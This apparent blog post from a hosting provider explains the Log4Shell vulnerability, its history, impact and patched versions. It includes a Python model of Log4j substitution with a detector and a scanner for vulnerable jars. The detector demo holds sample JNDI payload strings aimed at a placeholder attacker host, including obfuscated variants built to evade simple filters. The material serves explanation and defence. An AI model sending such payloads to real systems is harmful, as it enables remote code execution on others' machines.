What Is Log4Shell and How Does It Affect ScalaHosting?
On November 24, 2021, security researchers from Alibaba Cloud discovered a vulnerability in Log4j 2, a popular Java logging framework. They got in touch with The Apache Software Foundation, the organization responsible for developing Log4j, disclosed the bug, and helped with the release of a patch.
The fix, Log4j 2.15.0, was rolled out on December 6, and three days later, the whole thing was reported publicly. The vulnerability earned a nickname, Log4Shell, and even today, more than two weeks later, it continues to be a central topic for many tech-oriented news outlets. The first patch also turned out to be incomplete: 2.16.0 and 2.17.0 followed within two weeks to close the gaps it left (tracked as CVE-2021-45046 and CVE-2021-45105), so "patched" today means 2.17.0 or later, not 2.15.0.
But what’s all the fuss about?
What Is Log4Shell?
Log4Shell, tracked as CVE-2021-44228, is usually described as a zero-day vulnerability. The term means that attackers can exploit a bug before the affected software's maintainers have a fix available, so defenders have had "zero days" to prepare; it does not mean the vendor stays unaware for a long time. In Log4Shell's case, Apache had a patch ready at disclosure, but working exploits spread faster than most organizations could update, which is why the label stuck.
In this particular instance, the vulnerable code was added to Log4j in 2013, with the JNDI lookup feature in version 2.0-beta9. Theoretically, hackers had eight years during which they could have exploited the security hole without anyone knowing they needed to stop them.
The bug lies in Log4j 2's lookup feature. While formatting a log message, Log4j expands ${...} expressions in the text, and one of the supported lookups, ${jndi:...}, asks the Java Naming and Directory Interface (JNDI) API to fetch a Java object by name, most commonly from an LDAP server.
Because that expansion was applied to the message text itself, which often contains untrusted input such as an HTTP User-Agent header, a username or a chat message, an attacker only has to get a string like ${jndi:ldap://attacker-controlled-host/x} logged. Log4j then contacts the attacker's LDAP server, which can answer with a reference to a remote Java class that the JVM downloads and executes. Nothing sanitizes the input along the way, so a resourceful hacker can run just about anything they want on the target machine.
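To make the mechanism concrete, the following is an added example and not Log4j's or ScalaHosting's code: a simplified model of the string substitution Log4j 2 performed on log messages, reduced to nested ${...} expressions, the ":-default" syntax and three lookups. The JNDI lookup is a stub that records the URL it would have contacted instead of connecting anywhere, and attacker.example is a placeholder host. The same model doubles as a detector that catches obfuscated payloads a plain search for "${jndi:" would miss.

```python
from typing import Callable, Dict, List, Tuple

# Added example, not Log4j's code: a cut-down model of Log4j 2's message
# substitution (nested ${...}, ":-default", a few lookups). The real engine
# supports many more lookups (env, sys, date, ctx ...) and also re-expands
# the result of a lookup; both are omitted here.


class Substitutor:
    def __init__(self, lookups_enabled: bool = True) -> None:
        # lookups_enabled=False models log4j2.formatMsgNoLookups=true, i.e.
        # message text is no longer expanded at all.
        self.lookups_enabled = lookups_enabled
        self.jndi_requests: List[str] = []  # what the JNDI lookup would have fetched
        self.lookups: Dict[str, Callable[[str], str]] = {
            "lower": str.lower,
            "upper": str.upper,
            "jndi": self._jndi,
        }

    def _jndi(self, name: str) -> str:
        # Stand-in for JndiLookup: the real one resolves `name` via JNDI (LDAP,
        # RMI, DNS ...) and an attacker-run LDAP server can answer with a
        # reference to a remote class that the JVM then loads and runs.
        self.jndi_requests.append(name)
        return f"<object loaded from {name}>"

    def resolve(self, text: str) -> str:
        if not self.lookups_enabled:
            return text
        resolved, _ = self._parse(text, 0, nested=False)
        return resolved

    def _parse(self, text: str, i: int, nested: bool) -> Tuple[str, int]:
        """Expand ${...} innermost-first; returns (expanded text, stop index)."""
        out: List[str] = []
        while i < len(text):
            if text.startswith("${", i):
                inner, j = self._parse(text, i + 2, nested=True)
                if j < len(text) and text[j] == "}":
                    out.append(self._evaluate(inner))
                    i = j + 1
                else:  # unterminated "${": keep it literally
                    out.append("${" + inner)
                    i = j
            elif text[i] == "}" and nested:
                return "".join(out), i
            else:
                out.append(text[i])
                i += 1
        return "".join(out), i

    def _evaluate(self, body: str) -> str:
        """Evaluate "prefix:key" or "prefix:key:-default" the way Log4j does."""
        default = None
        if ":-" in body:
            body, default = body.split(":-", 1)
        prefix, sep, key = body.partition(":")
        lookup = self.lookups.get(prefix) if sep else None
        if lookup is not None:
            return lookup(key)
        if default is not None:  # "${::-j}" is an empty lookup with default "j"
            return default
        return "${" + body + "}"  # unknown variable: left as written


def render_log_line(user_agent: str, no_lookups: bool = False) -> Tuple[str, List[str]]:
    """Model of logger.info("User-Agent: {}", userAgent) in a web app: the
    attacker-controlled header becomes part of the message that gets expanded.
    Returns the rendered line and the JNDI targets rendering would contact."""
    sub = Substitutor(lookups_enabled=not no_lookups)
    line = sub.resolve("User-Agent: " + user_agent)
    return line, sub.jndi_requests


def triggers_jndi(line: str) -> bool:
    """Detection that survives obfuscation: instead of grepping for "${jndi:",
    run the text through the same expansion and see whether a JNDI lookup fires."""
    sub = Substitutor()
    sub.resolve(line)
    return bool(sub.jndi_requests)


if __name__ == "__main__":
    # Constructed payloads; attacker.example is a placeholder, not a real host.
    for ua in (
        "Mozilla/5.0 (X11; Linux x86_64)",
        "${jndi:ldap://attacker.example/a}",
        "${${lower:J}ndi:${::-l}dap://attacker.example/a}",  # evades a "${jndi:" grep
        "${${env:NOPE:-j}ndi:${upper:ldap}://attacker.example/a}",
    ):
        print(render_log_line(ua), "| suspicious:", triggers_jndi(ua))
    print(render_log_line("${jndi:ldap://attacker.example/a}", no_lookups=True))
```

The second and third payloads never contain the literal text "${jndi:", yet after expansion they perform exactly the same lookup as the first, which is why signature-based filters needed constant updating. Note also that turning message lookups off (the log4j2.formatMsgNoLookups setting, and the default in 2.15.0) is not a complete fix: it only exists in Log4j 2.10 and later, and CVE-2021-45046 showed that lookups could still be reached through other configuration paths. Upgrading to 2.17.0 or removing the JndiLookup class is the mitigation to rely on.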
It must be said that vulnerabilities are discovered in all sorts of software products every day. Usually, they are quickly patched and rarely prompt a particularly noteworthy response. However, with Log4Shell, things might be a little bit different.
How Bad Is It?
We all know that sometimes, in an attempt to draw as many clicks as they can, the media tend to blow a problem completely out of proportion, especially when we’re talking about niche fields like cybersecurity. Well, with Log4Shell, this is not the case.
It’s been described as “the most critical vulnerability in a decade,” and experts from Check Point reckon that it could mark the start of a “cyber pandemic” with potentially “incalculable” damages. They certainly have the figures to back those claims.
Check Point started monitoring the activity surrounding Log4Shell as soon as the bug was disclosed. Within 24 hours, they’d seen more than 60 different variations of the original exploit. In just three days, their sensors registered more than 800 thousand attempted attacks.
They say they have managed to mitigate around 4.3 million exploitation attempts and emphasize the danger posed to business organizations. According to their report, they have already seen attempted exploits against very nearly half of all corporate networks in the world.
In other words, yes, Log4Shell is a very serious problem. But what makes it so bad?
There are three main factors contributing to Log4Shell’s popularity with hackers:
It allows arbitrary remote code execution
The fact that attackers can make the target load and execute a remote Java class via Log4Shell means that the variety of payloads they can drop on the attacked machine is pretty much limitless. They have already demonstrated this.
Some attackers are trying to deploy cryptocurrency miners on the targeted machines. Others use the vulnerability to recruit more devices into their botnets, others still employ it to send spam, etc.
It’s easy to exploit
Part of the reason for the enormous volume of Log4Shell-related malicious activity is the readily available exploits and the fact that a single HTTP request with a crafted header is enough to test a target, so pretty much anyone can mount an attack. Because it is so easy to take advantage of the vulnerability, much of the Log4Shell traffic comes from mass scanners and opportunistic attackers rather than from targeted intrusions by people capable of doing real damage.
That being said, experienced cybercriminals also use Log4Shell, and they’ve already caused some pretty high-profile incidents. On December 20, for example, the Belgian Defense Ministry admitted that hackers had used Log4Shell to bring some of its networks down.
Log4j is pretty much everywhere
Log4j was developed way back in 2001 to solve the lack of logging capabilities in the original Java Development Kit. Over the years, we've seen the appearance of frameworks serving the same purpose, but Log4j has remained one of the most popular choices. Log4Shell affects the Log4j 2 branch only: the older Log4j 1.x has no JNDI lookup, although it has been end-of-life since 2015 and has unpatched issues of its own, so it is not a safe alternative either.
It's now a part of thousands of software packages, and it's pretty much everywhere. Even if you haven't installed it yourself, it may have been pulled in as a dependency of one of the applications you use in your everyday life, often bundled inside the application's own archive (a .war or .ear file, or a "shaded" jar) where a package manager will not list it. As a result, properly patching the vulnerability depends on many parties and may not be particularly easy. This is a problem because hackers have access to scanners that can determine whether you're vulnerable in seconds, and they don't need to know where Log4j lives on your system: a crafted request that ends up in a log file is enough to find out.
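Defenders can scan the same way from the inside. The following is an added example, not ScalaHosting's or Apache's code: a small offline scanner that walks a directory, opens every archive, recurses into jars nested inside .war/.ear files, reports the log4j-core version from the bundled Maven metadata and checks whether JndiLookup.class is still present. The three archives it scans are constructed inline as sample data and are not real artifacts.

```python
import io
import os
import tempfile
import zipfile
from typing import Iterator, List, Tuple

# Added example, not ScalaHosting's or Apache's code: find copies of log4j-core
# on disk, including jars nested inside .war/.ear archives that package
# managers do not see, and report whether JndiLookup.class (the code path
# behind CVE-2021-44228) is present.

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
Finding = Tuple[str, str, bool]  # (archive path, log4j-core version, JndiLookup present)


def _log4j_version(zf: zipfile.ZipFile) -> str:
    """Read the log4j-core version from the Maven pom.properties, if shipped."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return "unknown"
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return "unknown"


def _inspect(zf: zipfile.ZipFile, path: str) -> Iterator[Finding]:
    names = set(zf.namelist())
    if any(n.startswith("org/apache/logging/log4j/core/") for n in names):
        yield (path, _log4j_version(zf), JNDI_CLASS in names)
    for n in sorted(names):  # recurse: war -> WEB-INF/lib/*.jar, ear -> *.war ...
        if n.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(n)))
            except zipfile.BadZipFile:
                continue
            with inner:
                yield from _inspect(inner, f"{path}!/{n}")


def scan(root: str) -> List[Finding]:
    """Walk `root` and return every log4j-core occurrence found in archives."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(full) as zf:
                    findings.extend(_inspect(zf, full))
            except zipfile.BadZipFile:
                continue
    return sorted(findings)


def _parse_version(v: str) -> Tuple[int, int, int]:
    parts = [int(p) if p.isdigit() else 0 for p in v.split("-", 1)[0].split(".")]
    return tuple((parts + [0, 0, 0])[:3])  # "2.0-beta9" -> (2, 0, 0)


def assess(version: str, has_jndi_lookup: bool) -> str:
    """Map a finding to an action, using the fixed releases Apache published
    for Log4j 2 (Java 8+: 2.17.0, Java 7: 2.12.3, Java 6: 2.3.1)."""
    if not has_jndi_lookup:
        return "mitigated: JndiLookup.class absent (removed, or pre-2.0-beta9)"
    if version == "unknown":
        return "unknown version: inspect manually"
    v = _parse_version(version)
    if v[:2] == (2, 12):  # Java 7 line; 2.12.2 closed CVE-2021-44228, 2.12.3 the follow-ups
        return "fixed" if v >= (2, 12, 3) else (
            "partially fixed: upgrade to 2.12.3" if v >= (2, 12, 2) else "VULNERABLE: upgrade to 2.12.3")
    if v[:2] == (2, 3):  # Java 6 line
        return "fixed" if v >= (2, 3, 1) else "VULNERABLE: upgrade to 2.3.1"
    if v >= (2, 17, 0):
        return "fixed"
    if v >= (2, 15, 0):  # 2.15.0 / 2.16.0 were incomplete (CVE-2021-45046, CVE-2021-45105)
        return "partially fixed: upgrade to 2.17.0"
    return "VULNERABLE: CVE-2021-44228, upgrade to 2.17.0"


def _make_jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root: str) -> None:
    """Constructed sample data, not real artifacts: an unpatched jar, a jar with
    JndiLookup.class deleted, and a patched copy nested inside a webapp."""
    core = {"org/apache/logging/log4j/core/Logger.class": b"", JNDI_CLASS: b""}
    lib = os.path.join(root, "lib")
    os.makedirs(lib, exist_ok=True)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(_make_jar({**core, POM_PROPS: b"version=2.14.1\n"}))
    with open(os.path.join(lib, "shaded-app.jar"), "wb") as f:
        f.write(_make_jar({"org/apache/logging/log4j/core/Logger.class": b"",
                           POM_PROPS: b"version=2.14.1\n"}))
    with open(os.path.join(root, "app.war"), "wb") as f:
        f.write(_make_jar({"index.jsp": b"", "WEB-INF/lib/log4j-core-2.17.0.jar":
                           _make_jar({**core, POM_PROPS: b"version=2.17.0\n"})}))


def demo_scan() -> List[Tuple[str, str, str]]:
    """Build the sample tree in a temp dir, scan it and return
    (path relative to the tree, version, assessment) per finding."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return [(os.path.relpath(p, root), v, assess(v, j)) for p, v, j in scan(root)]


if __name__ == "__main__":
    for path, version, verdict in demo_scan():
        print(f"{path}: log4j-core {version}: {verdict}")
```

Run scan() against real directories such as the application server's deployment folder and the home directories of service accounts. The version check depends on the Maven metadata being present; a shaded or repackaged jar may not carry it, which is why the presence of JndiLookup.class is reported separately and is the more reliable signal.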
Vendors are scrambling to roll out updates, mitigate the dozens of available attack vectors, and let users know they need to update. However, with so many different applications deployed on such a large number of devices, we’re unlikely to see the problem go away for good any time soon.
ScalaHosting and Log4Shell
As a hosting provider, we can’t afford to ignore a threat like Log4Shell. The vulnerability is easily exploitable, and the affected framework is widely available. Because of this, we, alongside our data center partners, monitor our networks closely for any sign of suspicious activity.
We work hard on making software updates as easy as possible for our customers, and we always apply the latest security patches to everything that runs on our servers.
SShield, our proprietary AI-powered security system, will alert you immediately if something’s not right. You can also be sure that our technical support experts will point you in the right direction if you can’t figure out what’s going on.
Mind you, if you use one of our managed SPanel VPS solutions, Log4Shell is not really a problem at all. The purpose of a managed VPS is to give you the right hosting environment out of the box, meaning we are the ones setting up your virtual machines and installing all the software required to host your project.
This software doesn’t include Log4j.
Conclusion
Log4Shell is not to be underestimated. The affected software is found in many devices worldwide, the hackers clearly won’t shy away from using the dozens of available exploits, and the patches aren’t applied quickly enough.
Quite a few tools can help you determine whether your devices are vulnerable to an attack. For Log4j 2 itself, the fix is to upgrade log4j-core to 2.17.0 or later (2.12.3 for Java 7 and 2.3.1 for Java 6) or, where an upgrade is impossible, to remove the JndiLookup class from the jar, which Apache documents as the supported workaround. Regardless of what the tools tell you, you have to always keep your software applications up-to-date. This will protect you not only against Log4Shell but also against hundreds of other threats.
As for your ScalaHosting account, you can leave it to us.